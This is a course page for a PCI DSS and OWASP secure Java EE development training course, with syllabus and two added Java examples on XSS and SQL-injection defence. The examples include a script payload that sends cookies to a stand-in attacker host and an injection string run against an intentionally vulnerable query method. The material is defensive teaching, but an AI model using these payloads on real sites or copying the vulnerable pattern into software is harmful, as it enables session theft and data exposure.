"Our tailored course provided a well rounded introduction and also covered some intermediate level topics that we needed to know. Clive gave us some best practice ideas and tips to take away. Fast paced but the instructor never lost any of the delegates"
Brian Leek, Data Analyst, May 2022
This course gives delegates a sound understanding of the Payment Card Industry Data Security Standard (PCI DSS) as it applies to building secure applications on the Java EE platform.
This course has been developed for real-world, commercial scenarios by our expert instructors. See below for the detailed syllabus. If you have a technical question, please email us.
1. Security Principles
2. An understanding of OWASP and PCI DSS
3. Writing compliant Java code
4. How to test security
5. How to build privacy into your application
6. How to secure installations
7. How to write secure documentation and error messages.
8. How security concerns can be integrated into your development lifecycle
Session 1: Introduction
Introduction to tutor and course.
Session 2: Secure Development Overview
Application security: why web-facing applications are different, what web application security is and is not, and legal compliance.
Session 3: PCI-DSS
What PCI DSS is, the 12 requirements of PCI DSS, who must comply, and the cost of non-compliance.
Session 4: OWASP
What OWASP (the Open Web Application Security Project) is. The OWASP Top Ten (2010 edition): A1 Injection; A2 Cross-Site Scripting (XSS); A3 Broken Authentication and Session Management; A4 Insecure Direct Object References; A5 Cross-Site Request Forgery (CSRF); A6 Security Misconfiguration; A7 Insecure Cryptographic Storage; A8 Failure to Restrict URL Access; A9 Insufficient Transport Layer Protection; A10 Unvalidated Redirects and Forwards. Note that the Top Ten has been revised several times since 2010, so the category names and numbering in current OWASP material differ from those listed here. Other threats are considered as and when appropriate.
Session 5: Securing Application Servers
The problem of security misconfiguration: why the application server must be secured, hardening the application server, and hardening the underlying OS and database.
Session 6: Input Validation
Validating input from HttpServletRequest; Cross-Site Scripting (XSS) and defending against it; Insecure Direct Object References; Cross-Site Request Forgery (CSRF); output encoding; buffer overflows (in a Java EE application these arise in native code reached via JNI and in the JVM or its libraries, not in pure Java, whose memory is managed); malicious file execution.
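The two defences this session pairs, allow-list validation of a request parameter and contextual output encoding, as an added stand-alone example (not part of the course material). The servlet plumbing is left out so the class compiles and runs on its own; in a real servlet the raw value would come from request.getParameter(...) and the encoded value would be written to the response. The sample attack string and the username rule are constructed for illustration.

```java
import java.util.regex.Pattern;

/**
 * Added example: allow-list input validation plus HTML output encoding.
 * Assumptions (not from the course page): the username format below and the
 * constructed attack payload in main().
 */
public final class XssDefence {

    // Allow-list: what a username is permitted to look like. Anything that does
    // not match is rejected outright rather than "cleaned up".
    private static final Pattern USERNAME = Pattern.compile("^[A-Za-z0-9_.-]{3,32}$");

    /** Returns the validated value, or throws if the parameter is missing or malformed. */
    public static String validateUsername(String raw) {
        if (raw == null || !USERNAME.matcher(raw).matches()) {
            throw new IllegalArgumentException("invalid username");
        }
        return raw;
    }

    /**
     * Encode untrusted text for the HTML element-content context. These five
     * characters are the ones that can change HTML structure; emitting them as
     * entities makes the browser render the text instead of parsing it as markup.
     * Attribute, JavaScript, CSS and URL contexts each need a different encoder
     * (the OWASP Java Encoder project provides one per context).
     */
    public static String encodeForHtml(String untrusted) {
        if (untrusted == null) return "";
        StringBuilder sb = new StringBuilder(untrusted.length() + 16);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Constructed sample input, standing in for request.getParameter("username").
        String attack = "<script>document.location='http://evil.example/?c='+document.cookie</script>";

        // 1. Validation rejects the payload before it is stored or processed at all.
        try {
            validateUsername(attack);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("accepted: " + validateUsername("alice_01"));

        // 2. Where free text must be echoed back (a comment field, say), output
        //    encoding neutralises it at the point it enters the HTML.
        System.out.println("encoded: " + encodeForHtml(attack));
    }
}
```

Validation and encoding are not alternatives: validate on the way in against what the field is supposed to contain, and encode on the way out for the context the value lands in, because a value that is legitimate data (an apostrophe in a surname) can still break an HTML attribute.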
Session 7: SQL Injection
How SQL Injection works and how to defend against it.
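The same lookup written both ways, as an added example that is not part of the course material: string concatenation, which lets attacker input become part of the SQL grammar, beside a parameterised query, which sends the SQL text and the value to the driver separately. The methods accept any java.sql.Connection; the table name "users", its columns and the payload in main() are assumed for illustration.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/**
 * Added example: SQL injection via concatenation and its PreparedStatement fix.
 * Assumptions (not from the course page): a "users" table with id, email and
 * username columns, and the constructed payload in main().
 */
public final class SqlInjectionDemo {

    /** VULNERABLE: the caller's string is spliced into the SQL text. */
    static String buildVulnerableQuery(String username) {
        return "SELECT id, email FROM users WHERE username = '" + username + "'";
    }

    /** VULNERABLE: executes whatever buildVulnerableQuery produced. */
    static boolean userExistsVulnerable(Connection conn, String username) throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(buildVulnerableQuery(username))) {
            return rs.next();
        }
    }

    /**
     * FIXED: the SQL text is a constant and the value travels as a bound
     * parameter, so nothing the user supplies can be parsed as SQL. A quote in
     * the username is just a quote.
     */
    static boolean userExistsSafe(Connection conn, String username) throws SQLException {
        String sql = "SELECT id, email FROM users WHERE username = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed attacker input: the leading quote closes the string literal
        // and the rest appends a predicate that is true for every row.
        String payload = "x' OR '1'='1";

        // Print what the vulnerable version would actually send to the database.
        // No database is needed to see the problem: the WHERE clause now matches
        // every user, and a different suffix could add UNION SELECT or a comment.
        System.out.println(buildVulnerableQuery(payload));

        // userExistsSafe(conn, payload) would instead search for a user whose
        // name is literally  x' OR '1'='1  and return false.
    }
}
```

Parameters can bind values only. Identifiers such as table or column names and ORDER BY targets cannot be bound, so where those must vary they need an allow-list lookup (map the user's choice to one of a fixed set of known-good names) rather than concatenation.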
Session 8: Further Injection Flaws
XML/XPath injection, LDAP injection, command and resource injection; unvalidated redirects and forwards.
Session 9: Securing Web Applications
Broken authentication and session management: authentication and authorisation, web application security, Spring Security, X.509 certificates, session handling and session fixation, JAAS, single sign-on, CAPTCHA.
Session 10: Java EE Security
Java EE Authorization, Spring Authorization.
Session 11: Secure Web Services
JAX-WS based web services: why their security is an issue, and using WS-Security to go beyond basic authentication/authorisation and SSL/TLS.
Session 12: Additional Security Issues
Privilege Escalation, Denial of Service. People, Race conditions, Brute Forcing.
Session 13: Leaking information
Exception handling, Logging, Failure to Restrict URL Access.
Session 14: Cryptography and data protection
Insecure Cryptographic Storage and Insufficient Transport Layer Protection. Password hashing and the use of a salt. JCA/JCE for cryptography; JSSE for SSL/TLS.
Session 15: Secure Development Lifecycle
The secure development lifecycle as part of the overall software development lifecycle.
“JBI did a great job of customizing their syllabus to suit our business needs and also bringing our team up to speed on the current best practices. Our teams varied widely in terms of experience and the Instructor handled this particularly well - very impressive”
Brian F, Team Lead, RBS, Data Analysis Course, 20 April 2022
Copyright © 2025 JBI Training. All Rights Reserved.